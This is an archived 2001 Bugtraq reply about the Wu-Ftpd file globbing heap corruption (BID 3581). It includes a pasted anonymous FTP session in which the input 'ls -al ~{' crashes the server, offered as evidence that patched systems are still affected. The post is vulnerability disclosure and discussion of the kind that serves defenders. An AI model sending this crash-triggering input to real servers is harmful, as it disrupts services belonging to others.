[23368] in bugtraq
Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption
daemon@ATHENA.MIT.EDU (goba@Leu.Braila.Astral.Ro)
Mon Dec 3 00:01:53 2001
Date: Sun, 2 Dec 2001 18:07:34 +0200 (EET)
From: <goba@Leu.Braila.Astral.Ro>
To: bugtraq@securityfocus.com
In-Reply-To: <200111302029.PAA88697@cs.rpi.edu>
Message-ID: <Pine.LNX.4.21.0112021755430.15325-100000@Leu.Braila.Astral.Ro>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
On Fri, 30 Nov 2001, Hasan Azam Diwan wrote:
> Darwin's ftpd is not vulnerable... the "ls ~{" command returns a list of ~root.
>
[teste@XXX teste]$ ftp test.somehost.com
Connected to test.somehost.com.
220 Test.somehost.com FTP server (Version wu-2.6.1-16.7x.1) ready.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
KERBEROS_V4 rejected as an authentication type
Name (test:teste): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230-The response 'baubau' is not valid
230-Next time please use your e-mail address as your password
230- for example: joe@test.somehost.com
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (194,105,27,22,166,166)
550 Missing }
ftp> ls -al ~{
Segmentation fault (core dumped)
As you can see the problem still exist, even if updates are done.
Goba
